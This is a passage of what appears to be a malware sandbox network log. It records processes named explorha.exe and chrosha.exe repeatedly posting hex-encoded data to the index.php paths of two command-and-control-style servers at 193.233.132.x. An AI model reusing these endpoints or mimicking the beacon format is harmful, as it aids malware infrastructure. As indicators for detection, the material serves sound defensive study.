                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.265017986 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      480192.168.2.550324193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.272608042 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.522196054 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      481192.168.2.550325193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.621469975 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.869721889 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:11 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      482192.168.2.550326193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:11.910315990 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:12.161250114 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      483192.168.2.550327193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:12.121473074 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:12.374320030 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      484192.168.2.550328193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:12.409400940 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:12.657777071 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      485192.168.2.550329193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:12.727643013 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:12.975064039 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:12 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      486192.168.2.550330193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:13.022244930 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:13.266134024 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      487192.168.2.550331193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:13.226464987 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:13.478275061 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      488192.168.2.550332193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:13.508459091 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:13.750515938 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      489192.168.2.550333193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:13.839209080 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.083681107 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:13 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      490192.168.2.550334193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.115251064 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.359792948 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      491192.168.2.550335193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.331918955 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.581792116 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      492192.168.2.550336193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.611100912 CEST312OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.862996101 CEST196INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:14 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      493192.168.2.550337193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:14.942354918 CEST155OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:15.186094046 CEST197INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      494192.168.2.550338193.233.132.56804484C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:15.222395897 CEST158OUTPOST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:15.465049028 CEST219INHTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:15 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                      495192.168.2.550339193.233.132.167808024C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                      Apr 19, 2024 03:32:15.443209887 CEST309OUTPOST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
